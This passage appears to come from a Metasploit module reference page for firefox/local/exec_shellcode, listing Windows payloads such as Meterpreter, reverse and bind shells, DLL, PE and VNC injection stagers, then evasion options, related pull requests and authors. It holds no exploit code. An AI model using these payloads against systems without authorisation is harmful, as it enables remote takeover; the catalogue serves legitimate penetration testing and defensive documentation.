249 payload/windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
250 payload/windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
251 payload/windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager
252 payload/windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
253 payload/windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
254 payload/windows/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
255 payload/windows/meterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
256 payload/windows/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
257 payload/windows/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
258 payload/windows/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
259 payload/windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline
260 payload/windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline
261 payload/windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline
262 payload/windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline
263 payload/windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
264 payload/windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline
265 payload/windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP
266 payload/windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline
267 payload/windows/patchupdllinject/bind_hidden_ipknock_tcp normal No Windows Inject DLL, Hidden Bind Ipknock TCP Stager
268 payload/windows/patchupdllinject/bind_hidden_tcp normal No Windows Inject DLL, Hidden Bind TCP Stager
269 payload/windows/patchupdllinject/bind_ipv6_tcp normal No Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
270 payload/windows/patchupdllinject/bind_ipv6_tcp_uuid normal No Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
271 payload/windows/patchupdllinject/bind_named_pipe normal No Windows Inject DLL, Windows x86 Bind Named Pipe Stager
272 payload/windows/patchupdllinject/bind_nonx_tcp normal No Windows Inject DLL, Bind TCP Stager (No NX or Win7)
273 payload/windows/patchupdllinject/bind_tcp normal No Windows Inject DLL, Bind TCP Stager (Windows x86)
274 payload/windows/patchupdllinject/bind_tcp_rc4 normal No Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
275 payload/windows/patchupdllinject/bind_tcp_uuid normal No Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
276 payload/windows/patchupdllinject/reverse_ipv6_tcp normal No Windows Inject DLL, Reverse TCP Stager (IPv6)
277 payload/windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
278 payload/windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
279 payload/windows/patchupdllinject/reverse_tcp normal No Windows Inject DLL, Reverse TCP Stager
280 payload/windows/patchupdllinject/reverse_tcp_allports normal No Windows Inject DLL, Reverse All-Port TCP Stager
281 payload/windows/patchupdllinject/reverse_tcp_dns normal No Windows Inject DLL, Reverse TCP Stager (DNS)
282 payload/windows/patchupdllinject/reverse_tcp_rc4 normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
283 payload/windows/patchupdllinject/reverse_tcp_rc4_dns normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
284 payload/windows/patchupdllinject/reverse_tcp_uuid normal No Windows Inject DLL, Reverse TCP Stager with UUID Support
285 payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
286 payload/windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
287 payload/windows/patchupmeterpreter/bind_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
288 payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
289 payload/windows/patchupmeterpreter/bind_named_pipe normal No Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
290 payload/windows/patchupmeterpreter/bind_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
291 payload/windows/patchupmeterpreter/bind_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
292 payload/windows/patchupmeterpreter/bind_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
293 payload/windows/patchupmeterpreter/bind_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
294 payload/windows/patchupmeterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
295 payload/windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
296 payload/windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
297 payload/windows/patchupmeterpreter/reverse_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
298 payload/windows/patchupmeterpreter/reverse_tcp_allports normal No Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
299 payload/windows/patchupmeterpreter/reverse_tcp_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
300 payload/windows/patchupmeterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
301 payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
302 payload/windows/patchupmeterpreter/reverse_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
303 payload/windows/peinject/bind_hidden_ipknock_tcp normal No Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
304 payload/windows/peinject/bind_hidden_tcp normal No Windows Inject PE Files, Hidden Bind TCP Stager
305 payload/windows/peinject/bind_ipv6_tcp normal No Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
306 payload/windows/peinject/bind_ipv6_tcp_uuid normal No Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
307 payload/windows/peinject/bind_named_pipe normal No Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
308 payload/windows/peinject/bind_nonx_tcp normal No Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
309 payload/windows/peinject/bind_tcp normal No Windows Inject PE Files, Bind TCP Stager (Windows x86)
310 payload/windows/peinject/bind_tcp_rc4 normal No Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
311 payload/windows/peinject/bind_tcp_uuid normal No Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
312 payload/windows/peinject/reverse_ipv6_tcp normal No Windows Inject PE Files, Reverse TCP Stager (IPv6)
313 payload/windows/peinject/reverse_named_pipe normal No Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
314 payload/windows/peinject/reverse_nonx_tcp normal No Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
315 payload/windows/peinject/reverse_ord_tcp normal No Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
316 payload/windows/peinject/reverse_tcp normal No Windows Inject PE Files, Reverse TCP Stager
317 payload/windows/peinject/reverse_tcp_allports normal No Windows Inject PE Files, Reverse All-Port TCP Stager
318 payload/windows/peinject/reverse_tcp_dns normal No Windows Inject PE Files, Reverse TCP Stager (DNS)
319 payload/windows/peinject/reverse_tcp_rc4 normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
320 payload/windows/peinject/reverse_tcp_rc4_dns normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
321 payload/windows/peinject/reverse_tcp_uuid normal No Windows Inject PE Files, Reverse TCP Stager with UUID Support
322 payload/windows/pingback_bind_tcp normal No Windows x86 Pingback, Bind TCP Inline
323 payload/windows/pingback_reverse_tcp normal No Windows x86 Pingback, Reverse TCP Inline
324 payload/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
325 payload/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
326 payload/windows/shell/bind_hidden_ipknock_tcp normal No Windows Command Shell, Hidden Bind Ipknock TCP Stager
327 payload/windows/shell/bind_hidden_tcp normal No Windows Command Shell, Hidden Bind TCP Stager
328 payload/windows/shell/bind_ipv6_tcp normal No Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
329 payload/windows/shell/bind_ipv6_tcp_uuid normal No Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
330 payload/windows/shell/bind_named_pipe normal No Windows Command Shell, Windows x86 Bind Named Pipe Stager
331 payload/windows/shell/bind_nonx_tcp normal No Windows Command Shell, Bind TCP Stager (No NX or Win7)
332 payload/windows/shell/bind_tcp normal No Windows Command Shell, Bind TCP Stager (Windows x86)
333 payload/windows/shell/bind_tcp_rc4 normal No Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
334 payload/windows/shell/bind_tcp_uuid normal No Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
335 payload/windows/shell/reverse_ipv6_tcp normal No Windows Command Shell, Reverse TCP Stager (IPv6)
336 payload/windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7)
337 payload/windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
338 payload/windows/shell/reverse_tcp normal No Windows Command Shell, Reverse TCP Stager
339 payload/windows/shell/reverse_tcp_allports normal No Windows Command Shell, Reverse All-Port TCP Stager
340 payload/windows/shell/reverse_tcp_dns normal No Windows Command Shell, Reverse TCP Stager (DNS)
341 payload/windows/shell/reverse_tcp_rc4 normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
342 payload/windows/shell/reverse_tcp_rc4_dns normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
343 payload/windows/shell/reverse_tcp_uuid normal No Windows Command Shell, Reverse TCP Stager with UUID Support
344 payload/windows/shell/reverse_udp normal No Windows Command Shell, Reverse UDP Stager with UUID Support
345 payload/windows/shell_bind_tcp normal No Windows Command Shell, Bind TCP Inline
346 payload/windows/shell_bind_tcp_xpfw normal No Windows Disable Windows ICF, Command Shell, Bind TCP Inline
347 payload/windows/shell_hidden_bind_tcp normal No Windows Command Shell, Hidden Bind TCP Inline
348 payload/windows/shell_reverse_tcp normal No Windows Command Shell, Reverse TCP Inline
349 payload/windows/speak_pwned normal No Windows Speech API - Say "You Got Pwned!"
350 payload/windows/upexec/bind_hidden_ipknock_tcp normal No Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
351 payload/windows/upexec/bind_hidden_tcp normal No Windows Upload/Execute, Hidden Bind TCP Stager
352 payload/windows/upexec/bind_ipv6_tcp normal No Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
353 payload/windows/upexec/bind_ipv6_tcp_uuid normal No Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
354 payload/windows/upexec/bind_named_pipe normal No Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
355 payload/windows/upexec/bind_nonx_tcp normal No Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
356 payload/windows/upexec/bind_tcp normal No Windows Upload/Execute, Bind TCP Stager (Windows x86)
357 payload/windows/upexec/bind_tcp_rc4 normal No Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
358 payload/windows/upexec/bind_tcp_uuid normal No Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
359 payload/windows/upexec/reverse_ipv6_tcp normal No Windows Upload/Execute, Reverse TCP Stager (IPv6)
360 payload/windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
361 payload/windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
362 payload/windows/upexec/reverse_tcp normal No Windows Upload/Execute, Reverse TCP Stager
363 payload/windows/upexec/reverse_tcp_allports normal No Windows Upload/Execute, Reverse All-Port TCP Stager
364 payload/windows/upexec/reverse_tcp_dns normal No Windows Upload/Execute, Reverse TCP Stager (DNS)
365 payload/windows/upexec/reverse_tcp_rc4 normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
366 payload/windows/upexec/reverse_tcp_rc4_dns normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
367 payload/windows/upexec/reverse_tcp_uuid normal No Windows Upload/Execute, Reverse TCP Stager with UUID Support
368 payload/windows/upexec/reverse_udp normal No Windows Upload/Execute, Reverse UDP Stager with UUID Support
369 payload/windows/vncinject/bind_hidden_ipknock_tcp normal No VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
370 payload/windows/vncinject/bind_hidden_tcp normal No VNC Server (Reflective Injection), Hidden Bind TCP Stager
371 payload/windows/vncinject/bind_ipv6_tcp normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
372 payload/windows/vncinject/bind_ipv6_tcp_uuid normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
373 payload/windows/vncinject/bind_named_pipe normal No VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
374 payload/windows/vncinject/bind_nonx_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
375 payload/windows/vncinject/bind_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
376 payload/windows/vncinject/bind_tcp_rc4 normal No VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
377 payload/windows/vncinject/bind_tcp_uuid normal No VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
378 payload/windows/vncinject/reverse_hop_http normal No VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
379 payload/windows/vncinject/reverse_http normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
380 payload/windows/vncinject/reverse_http_proxy_pstore normal No VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
381 payload/windows/vncinject/reverse_ipv6_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
382 payload/windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
383 payload/windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
384 payload/windows/vncinject/reverse_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager
385 payload/windows/vncinject/reverse_tcp_allports normal No VNC Server (Reflective Injection), Reverse All-Port TCP Stager
386 payload/windows/vncinject/reverse_tcp_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
387 payload/windows/vncinject/reverse_tcp_rc4 normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
388 payload/windows/vncinject/reverse_tcp_rc4_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
389 payload/windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
390 payload/windows/vncinject/reverse_winhttp normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
391 payload/windows/x64/exec normal No Windows x64 Execute Command
392 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
393 payload/windows/x64/messagebox normal No Windows MessageBox x64
394 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
395 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
396 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
397 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
398 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
399 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
400 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
401 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
402 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
403 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
404 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
405 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
406 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
407 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
408 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
409 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
410 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
411 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
412 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
413 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
414 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
415 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
416 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
417 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
418 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
419 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
420 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
421 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
422 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
423 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
424 payload/windows/x64/pingback_reverse_tcp normal No Windows x64 Pingback, Reverse TCP Inline
425 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
426 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
427 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
428 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
429 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
430 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
431 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
432 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
433 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
434 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
435 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
436 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
437 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
438 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
439 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
440 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
441 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
442 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
443 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
444 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
445 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
446 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
447 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
448 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
449 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
450 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
Evasion Options
Here is the full list of possible evasion options supported by the firefox/local/exec_shellcode exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(firefox/local/exec_shellcode) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Related Pull Requests
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #8169 Merged Pull Request: Add missing ranks
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #3116 Merged Pull Request: Minor updates for release
- #3091 Merged Pull Request: Add support for running native shellcode payloads from a Firefox privileged javascript shell session
Go back to menu.
See Also
Check also the following modules related to this module:
- post/windows/manage/exec_powershell
- post/windows/manage/powershell/exec_powershell
- post/windows/manage/shellcode_inject
Authors
- joev
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.